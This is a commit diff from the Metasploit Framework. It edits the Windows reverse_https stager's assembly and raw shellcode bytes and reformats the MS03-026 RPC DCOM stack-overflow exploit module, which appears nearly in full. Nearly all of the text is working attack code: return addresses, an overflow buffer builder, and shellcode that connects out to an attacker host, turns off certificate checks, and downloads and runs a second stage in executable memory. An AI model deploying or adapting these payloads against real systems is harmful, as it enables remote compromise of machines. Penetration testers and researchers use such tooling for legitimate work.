Bug fixes and size improvements for the reverse_https stager

git-svn-id: file:///home/svn/framework3/trunk@9001 4d416f70-5f16-0410-b530-b9f4589650da

external/source/shellcode/windows/x86/src/block/block_reverse_https.asm

@@ -7,8 +7,7 @@
 
 ; Input: EBP must be the address of 'api_call'.
 ; Output: EDI will be the socket for the connection to the server
-; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
-
+; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
 load_wininet:
   push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
   push 0x696e6977        ; ...
@@ -69,11 +68,11 @@ httpopenrequest:
   mov esi, eax           ; hHttpRequest
 
 httpsendrequest:
-  xor ebx, ebx
-  push ebx               ; optional length
-  push ebx               ; optional
-  push ebx               ; dwHeadersLength
-  push ebx               ; headers
+  xor edi, edi
+  push edi               ; optional length
+  push edi               ; optional
+  push edi               ; dwHeadersLength
+  push edi               ; headers
   push esi               ; hHttpRequest
   push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )
   call ebp
@@ -84,9 +83,11 @@ check_ssl:
 ; In the case of an invalid certificate authority, we have to wait until the error occurs,
 ; set an option to disable it, then try it all over again. This wastes shellcode space,
 ; but its required to use this payload without a valid signed cert.
-  push 0x5DE2C5AA        ; hash( "kernel32.dll", "GetLastError" )
-  call ebp
-  cmp al, 0x0d           ; ERROR_INTERNET_INVALID_CA (0x2f0d)
+;  push 0x5DE2C5AA        ; hash( "kernel32.dll", "GetLastError" )
+;  call ebp
+
+  ; The error message is left in ECX
+  cmp cl, 0x0d           ; ERROR_INTERNET_INVALID_CA (0x2f0d)
   jne failure
 
 ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
@@ -121,7 +122,7 @@ allocate_memory:
   push byte 0x40         ; PAGE_EXECUTE_READWRITE
   push 0x1000            ; MEM_COMMIT
   push 0x00400000        ; Stage allocation (8Mb ought to do us)
-  push ebx               ; NULL as we dont care where the allocation is (zero'd from the prev function)
+  push edi               ; NULL as we dont care where the allocation is (zero'd from the prev function)
   push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
   call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
@@ -133,7 +134,7 @@ download_prep:
 
 download_more:
   push edi               ; &bytesRead
-  push ebx               ; buffer as the length, seems to work (Win7)
+  push 8192              ; read length
   push ebx               ; buffer
   push esi               ; hRequest
   push 0xE2899612        ; hash( "wininet.dll", "InternetReadFile" )

modules/exploits/windows/dcerpc/ms03_026_dcom.rb

@@ -3,7 +3,7 @@
 ##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'Microsoft RPC DCOM Interface Overflow',
 			'Description'    => %q{
 				This module exploits a stack overflow in the RPCSS service, this vulnerability
-				was originally found by the Last Stage of Delirium research group and has been 
+				was originally found by the Last Stage of Delirium research group and has been
 				widely exploited ever since. This module can exploit the English versions of
 				Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
 			},
@@ -47,16 +47,16 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Space'    => 880,
 					'MinNops'  => 300,
 					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
-					'StackAdjustment' => -3500,
+					'StackAdjustment' => -3500
 				},
-			'Targets'        => 
+			'Targets'        =>
 				[
 					# Target 0: Universal
-					[ 
+					[
 						'Windows NT SP3-6a/2000/XP/2003 Universal',
 						{
 							'Platform' => 'win',
-							'Rets'     => 
+							'Rets'     =>
 								[
 									0x77f33723, # Windows NT 4.0 SP6a (esp)
 									0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
@@ -76,27 +76,27 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Common vulnerability scanning tools report port 445/139
 		# due to how they test for the vulnerability. Remap this
 		# back to 135 for automated exploitation
-		
+
 		rport = datastore['RPORT'].to_i
 		if ( rport == 139 or rport == 445 )
 			datastore['RPORT'] = 135
 		end
-		
+
 		true
 	end
-		
+
 	def exploit
 		connect
 		print_status("Trying target #{target.name}...")
-	
+
 		handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
 		print_status("Binding to #{handle} ...")
 		dcerpc_bind(handle)
 		print_status("Bound to #{handle} ...")
-				
+
 		# Carefully create the combination of addresses and code for cross-os exploitation
 		xpseh = rand_text_alphanumeric(360, payload_badchars)
-		
+
 		# Jump to [esp-4] - (distance to shellcode)
 		jmpsc =
 			"\x8b\x44\x24\xfc"      + 		# mov eax,[esp-0x4]
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		xpseh[ 306, 2 ] = Rex::Arch::X86.jmp_short('$+8')
 		xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V')
 		xpseh[ 314, jmpsc.length ] = jmpsc
-		
+
 		#
 		# NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
 		# NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
@@ -136,30 +136,30 @@ class Metasploit3 < Msf::Exploit::Remote
 		# sits just below these overwrites...
 		#
 
-		nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") + 
-	            	rand_text(2, payload_badchars)		
+		nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
+	            	rand_text(2, payload_badchars)
 
 		nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
 		nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
-		ntshiz = 
-			nt4sp3jmp + 
-			[ target['Rets'][6] ].pack('V') + 
+		ntshiz =
+			nt4sp3jmp +
+			[ target['Rets'][6] ].pack('V') +
 			[ target['Rets'][5] ].pack('V') +
-			nt4sp5jmpback + 
+			nt4sp5jmpback +
 			nt4sp3jmpback
 
 		# Pad to the magic value of 118 bytes
-		ntshiz += rand_text(118 - ntshiz.length, payload_badchars)		
-		
+		ntshiz += rand_text(118 - ntshiz.length, payload_badchars)
+
 		# Create the evil UNC path used in the overflow
-		uncpath = 
-			Rex::Text.to_unicode("\\\\") + 
+		uncpath =
+			Rex::Text.to_unicode("\\\\") +
 			make_nops(32) +
-			
+
 			# When attacking NT 4.0, jump over 2000/XP return
 			Rex::Arch::X86.jmp_short(16) +
 			Rex::Arch::X86.jmp_short(25) +
-			
+
 			[ target['Rets'][2] ].pack('V') +   # Return address for 2000 (ebx)
 			[ target['Rets'][0] ].pack('V') +   # Return address for NT 4.0 SP6 (esi)
 			[ target['Rets'][1] ].pack('V') +   # Writable address on 2000 and jmp for NT 4.0
@@ -172,8 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			make_nops(4) +
 			Rex::Arch::X86.jmp_short(4) +
 			rand_text(4, payload_badchars) +
-			payload.encoded + 
-			ntshiz + 
+			payload.encoded +
+			ntshiz +
 			xpseh +
 			Rex::Text.to_unicode("\\\x00")
 
@@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			NDR.long(0) +
 			NDR.long(0) +
 
-			rand_text(16) + 
+			rand_text(16) +
 
 			NDR.long(0) +
 			NDR.long(0) +
@@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			NDR.long(1) +
 			NDR.long(1) +
 			NDR.long(rand(0xFFFFFFFF))
-		
+
 		print_status('Sending exploit ...')
 		begin
 			dcerpc_call(0, stubdata)
@@ -220,7 +220,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		handler
-		disconnect	
+		disconnect
 	end
 
 end
+

modules/payloads/stagers/windows/reverse_https.rb

@@ -34,7 +34,7 @@ module Metasploit3
 				{
 					'Offsets' =>
 						{
-							 'EXITFUNC' => [ 295, 'V' ],
+							 'EXITFUNC' => [ 289, 'V' ],
 							 'LPORT'    => [ 190, 'v' ], # Not a typo, really little endian
 						},
 					'Payload' =>
@@ -49,18 +49,18 @@ module Metasploit3
 						"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
 						"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
 						"\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
-						"\xFF\xD5\xEB\x64\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
-						"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x4D\x59\x31\xD2" +
+						"\xFF\xD5\xEB\x5E\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
+						"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x47\x59\x31\xD2" +
 						"\x52\x68\x00\x32\xE0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
-						"\x3B\xFF\xD5\x89\xC6\x31\xDB\x53\x53\x53\x53\x56\x68\x2D\x06\x18" +
-						"\x7B\xFF\xD5\x85\xC0\x75\x36\x68\xAA\xC5\xE2\x5D\xFF\xD5\x3C\x0D" +
-						"\x75\x24\x68\x80\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68" +
-						"\x75\x46\x9E\x86\xFF\xD5\xEB\xCD\xEB\x45\xE8\xAE\xFF\xFF\xFF\x2F" +
-						"\x31\x32\x33\x34\x35\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68" +
-						"\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF" +
-						"\xD5\x93\x53\x53\x89\xE7\x57\x53\x53\x56\x68\x12\x96\x89\xE2\xFF" +
-						"\xD5\x85\xC0\x74\xD1\x8B\x07\x01\xC3\x85\xC0\x75\xE9\x58\xC3\xE8" +
-						"\x50\xFF\xFF\xFF"
+						"\x3B\xFF\xD5\x89\xC6\x31\xFF\x57\x57\x57\x57\x56\x68\x2D\x06\x18" +
+						"\x7B\xFF\xD5\x85\xC0\x75\x30\x80\xF9\x0D\x75\x24\x68\x80\x33\x00" +
+						"\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" +
+						"\xEB\xD3\xEB\x49\xE8\xB4\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00" +
+						"\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00" +
+						"\x00\x40\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7" +
+						"\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85" +
+						"\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x52\xFF" +
+						"\xFF\xFF"
 				}
 			))
 	end